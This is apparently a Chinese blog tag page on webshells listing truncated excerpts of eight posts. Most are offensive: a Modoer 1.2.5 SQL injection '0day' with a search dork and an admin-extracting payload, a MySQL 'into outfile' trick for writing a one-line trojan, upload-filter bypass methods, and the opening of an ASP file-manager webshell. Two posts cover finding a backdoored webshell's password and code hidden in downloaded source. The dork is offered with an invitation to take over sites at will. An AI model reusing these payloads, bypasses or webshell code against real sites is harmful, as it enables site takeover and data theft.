标签: webshell

8 篇文章

TNTHK小组内部版webshell后门解析
下面简单的揭露下怎么获取webshell后门密码 1、在password登陆框 随便输入一错误密码,提示error,如图: 2、然后右键查看源文件,搜索[password],font 后面跟的就是shell的密码,测试一下 3、按照上面的方法,貌似通杀...
Modoer 1.2.5 SQL 0day
演示站点:http://www.xxxxx.com 关键字:Powered by Modoer site:.com (可以根据需求自行拿站) 测试漏洞: ajax.php?action=digg&idtype=shop&keyid=* FROM modoer_admin Where id=1 and substring((Select adminname FROM modoer_a…
asp网站手工添加验证码
一、先下载验证码所需要的文件 附件:imgchk(asp验证代码).rar(91645 Byte) 该压缩包为 imgchk 文件夹 ,其中有三个文件:validatecode.asp、validatebody.fix、validatehead.fix,主要即是为生成验证码服务的。 将解压文件夹直接释放在需要在某页添加验证码的同目录下(比如 addnew.asp 需要添加验证码,该文件在 cnbr…
MySQL一句话导出Shell
Drop TABLE IF EXISTS temp; //如果存在temp表就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段 Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表 Select cmd from temp into out file '…
上传漏洞的再次发掘
方法一: 本地上传,修改action的地址为上传页面并且在路径后面加上*.asp;或者加个. (此法已测试成功) 方法二: 即截断,直接在路径后面加*.asp空格,然后在16进制下面将20改为00.然后抓包NC上传。这里要切记如果文件大小有变化,一定要修改包的大小。 作者觉得此方法亦较复杂,遂另辟蹊径寻得一好方法,具体如下(此乃重点): 1、首先需要安装opera游览器(非IE内核) 2、找到一处…
源码藏猫腻?
话说某天,为改一代码,遂用DW搜索,如图: 乍一看,不对啊,怎么冒出一个asa文件,我记得这里面的源码全是asp的啊?遂打开该文件,如图: 是不是觉得很像我们平时用的webshell啊?我们再用IE打开看下,如图: 害怕了吧!若是我不知情把它上传到空间去,那就间接的给人家放一个webshell,想想就后怕!看来网上下的代码也不干净,真是天下无免费的午餐......
一款ASP精巧小马
<%on error resume next%> <%ofso="scripting.filesystemobject"%> <%set fso=server.createobject(ofso)%> <%path=request("path")%> <%if path<>"&quo…